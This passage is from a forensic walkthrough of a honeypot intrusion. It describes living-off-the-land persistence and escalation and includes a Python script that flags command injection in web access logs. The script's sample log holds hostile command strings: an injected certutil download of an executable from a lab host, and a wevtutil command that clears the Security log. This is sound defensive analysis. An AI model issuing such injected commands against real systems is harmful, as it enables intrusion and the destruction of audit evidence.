This walkthrough provides a comprehensive forensic analysis of an insider threat incident on a honeypot system designed to simulate a secure YARA rule testing portal. The investigation traces the complete attack lifecycle, from initial access via a web vulnerability to persistence, privilege escalation, and lateral movement. Our mission is to dissect the forensic artifacts provided to uncover the attacker's tactics, techniques, and procedures (TTPs).
The threat actor makes proficient use of "Living off the Land" (LotL) techniques, leveraging native Windows binaries and scripts to achieve their objectives while minimizing their footprint. The attack begins with the exploitation of a command injection vulnerability in the web portal's PHP source code. Following initial access, the actor performs reconnaissance with standard utilities such as `whoami`, `tasklist`, and `ping` to understand the compromised environment. Defense evasion is a recurring theme: the attacker uses `certutil.exe` to download payloads, `wevtutil.exe` to clear event logs, and disguises a well-known lateral movement tool (Masquerading, T1036) to avoid detection.
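The first place the chain above shows up is the web server access log: every injected command arrives URL-encoded inside a request parameter. The following Python script is an added example, not code from the walkthrough, that decodes combined-format log lines, splits each parameter on shell metacharacters to recover the appended command, and maps the binary to the ATT&CK technique it is normally associated with. The endpoint `/scan.php`, its `rule` parameter, the private lab addresses and the log lines themselves are constructed for the example and do not come from the incident data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined-format access log line. Only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \d+$'
)
# Metacharacters that terminate the legitimate argument and start an attacker-supplied
# command once PHP hands the parameter to a shell (cmd.exe on this host).
SHELL_META = re.compile(r'[;&|`\n]|\$\(')

# Native binaries the walkthrough attributes to the actor and the ATT&CK technique
# each is conventionally mapped to.
LOTL = {
    "whoami":   ("Discovery", "T1033"),
    "tasklist": ("Discovery", "T1057"),
    "ping":     ("Discovery", "T1018"),
    "certutil": ("Ingress Tool Transfer", "T1105"),
    "wevtutil": ("Indicator Removal", "T1070.001"),
}

# Constructed sample log (not from the original walkthrough). It assumes a hypothetical
# endpoint /scan.php whose `rule` parameter reached the shell unsanitised.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /scan.php?rule=test HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:03:11 +0000] "GET /scan.php?rule=test%26whoami HTTP/1.1" 200 640
10.0.0.7 - - [12/Mar/2024:10:03:40 +0000] "GET /scan.php?rule=x%7Ctasklist HTTP/1.1" 200 9031
10.0.0.7 - - [12/Mar/2024:10:05:02 +0000] "GET /scan.php?rule=x%26certutil+-urlcache+-split+-f+http%3A%2F%2F10.0.0.7%2Fp.exe+C%3A%5CWindows%5CTemp%5Cp.exe HTTP/1.1" 200 77
10.0.0.7 - - [12/Mar/2024:10:09:15 +0000] "GET /scan.php?rule=x%26wevtutil+cl+Security HTTP/1.1" 200 12
"""


def parse_line(line):
    """Return the log fields plus the decoded query parameters, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs splits on the literal '&' first, so an encoded %26 stays inside the value.
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def injected_commands(value):
    """Split a decoded parameter on shell metacharacters and return the trailing
    fragments, i.e. the commands appended to the legitimate input ([] if none)."""
    pieces = [p.strip() for p in SHELL_META.split(value)]
    return [p for p in pieces[1:] if p]


def classify(cmd):
    """Map the first token of a command to (tactic, technique), ignoring path and .exe."""
    binary = cmd.split()[0].lower().rsplit("\\", 1)[-1]
    if binary.endswith(".exe"):
        binary = binary[:-4]
    return LOTL.get(binary)


def analyze(log_text):
    """One finding per injected command, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param, values in rec["params"].items():
            for value in values:
                for cmd in injected_commands(value):
                    tactic, technique = classify(cmd) or ("unmapped", None)
                    findings.append({"src": rec["src"], "ts": rec["ts"], "param": param,
                                     "command": cmd, "tactic": tactic, "technique": technique})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['technique'] or '-':<10} {f['command']}")
```

Sorting the findings by timestamp gives the reconnaissance-to-evasion ordering the summary describes; a `certutil -urlcache` hit is also the cue to go and carve the downloaded file from the path it names.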
A notable feature of this intrusion is the sophisticated, multi-stage persistence mechanism. The attacker establishes a foothold using a BITS job (T1197), which in turn leverages `regsvr32.exe` to execute a remote scriptlet—a technique known as "Squiblydoo" (T1218.010). This triggers a periodically executed, obfuscated PowerShell script that ultimately injects shellcode into memory. The investigation also uncovers the attacker's method for privilege escalation, which involves abusing the `SeDebugPrivilege` to gain SYSTEM-level access.
Throughout this analysis, we will systematically examine a range of forensic artifacts using industry-standard tools, including PECmd, MFTECmd, BitsParser, Timeline Explorer, and CyberChef. By correlating data from web server l